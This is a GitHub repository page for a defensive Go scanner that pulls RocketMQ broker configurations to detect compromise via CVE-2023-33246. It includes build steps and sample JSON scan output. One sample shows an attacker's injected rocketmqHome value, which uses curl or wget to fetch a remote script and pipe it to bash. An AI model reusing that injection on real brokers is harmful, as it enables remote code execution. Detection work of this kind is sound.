Skip to content

vulncheck-oss/fetch-broker-conf

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits

.gitignore

.gitignore

 
 

.golangci.yml

.golangci.yml

 
 

Dockerfile

Dockerfile

 
 

LICENSE

LICENSE

 
 

Makefile

Makefile

 
 

README.md

README.md

 
 

go.mod

go.mod

 
 

go.sum

go.sum

 
 

main.go

main.go

 
 

Repository files navigation

Fetch Broker Configuration

Fetch Broker Configuration will try to download the RocketMQ broker configuration in order to hunt for indicators of compromise in the rocketmqHome variable. The variable is used by various attackers to execute code via CVE-2023-33246. For additional details, see the VulnCheck blog.

Compiling

You can use the makefile to build a docker container:

make docker

Or, if you have a Go build environment ready to go, just use make:

albinolobster@mournland:~/fetch-broker-conf$ make
gofmt -d -w main.go
golangci-lint run --fix main.go
GOOS=linux GOARCH=arm64 go build -o build/main_linux-arm64 main.go

Usage

The tool is built on top of go-exploit, so there are multipe ways to provide targets to scan. A full description can be found in the project's scanning documentation. However, the following shows some examples:

Scanning One Host

albinolobster@mournland:~/fetch-broker-conf$ ./build/main_linux-arm64 -a -e -rhost 10.9.49.143 -rport 10911 -log-json true | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-09-05T05:27:48.567836165-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.143",
  "port": 10911
}

Scanning Multiple Hosts

albinolobster@mournland:~/fetch-broker-conf$ ./build/main_linux-arm64 -a -e -rhosts 10.9.49.143,10.9.49.150 -rport 10911 -log-json true | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-09-05T05:34:27.505747211-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.143",
  "port": 10911
}
{
  "time": "2023-09-05T05:34:27.802345043-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.150",
  "port": 10911
}

Scanning a File of Hosts Using a Proxy

go-exploit provides the ability to scan via a provided target csv, where the csv is: host, port, anything if ssl is enabled (although the SSL field is ignored if -a is used). It also provides the ability to scan through a proxy. The command works like so (note that -a is SSL autodetection):

albinolobster@mournland:~/rocketmq-broker-conf$ ./build/main_linux-arm64 -a -e -rhosts-file /tmp/rocketmq.csv -proxy socks5://127.0.0.1:9050 -log-json true 2>/dev/null | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-08-31T13:45:35.781849255-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "-c $@|sh . echo (curl -s x.x.x.x/rm.sh||wget -q -O- x.x.x.x/rm.sh)|bash;",
  "host": "x.x.x.x",
  "port": 10909
}

About

A go-exploit for fetching the RocketMQ broker configuration in order to discover indicators of compromise for CVE-2023-33246

vulncheck.com/blog/rocketmq-exploit-payloads

Topics

cve-2023-33246 go-exploit

Resources

Readme

License

Apache-2.0 license
Activity
Custom properties

Stars

5 stars

Watchers

1 watching

Forks

1 fork
Report repository

Languages